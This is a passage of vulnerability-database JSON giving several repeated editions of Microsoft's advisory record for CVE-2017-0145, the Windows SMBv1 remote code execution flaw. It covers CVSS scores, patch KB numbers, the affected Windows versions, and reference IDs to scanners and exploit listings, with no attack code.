"reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-28T08:53:53", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", 
"700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KBMS16-110, 3187754", "KB4012215", "KB4012212", "KB4012216", "KB3212646", "KB3205409", "KB3213986", "KB3177186", "KB4012598", "KB4012217", "KB4012606", "KB3210721", "KB4012214", "KB4013198", "KB4012213", "KB3205401", "KB4014077", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 
3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 
8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 
{"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core 
installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", 
"kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T08:53:53", "differentElements": ["msAffectedSoftware"], "edition": 78}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server; no credentials are required, consistent with the Au:N / PR:N CVSS vectors recorded for this CVE.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-28T22:45:57", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, 
{"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012216", "KB3210721", "KB4012598", "KB4013198", "KB4012217", "KB3210720", "KB4012606", "KB3212646", "KB3205401", "KB4012214", "KB4012215", "KB4012212", "KB4012213", "KB3205409", "KB4014077", "KBMS16-110, 3187754", "KB3213986", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 
(Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", 
"msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": 
"KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T22:45:57", "differentElements": ["msAffectedSoftware"], "edition": 79}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server; no credentials are required, consistent with the Au:N / PR:N CVSS vectors recorded for this CVE.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-29T08:51:23", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": 
["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", 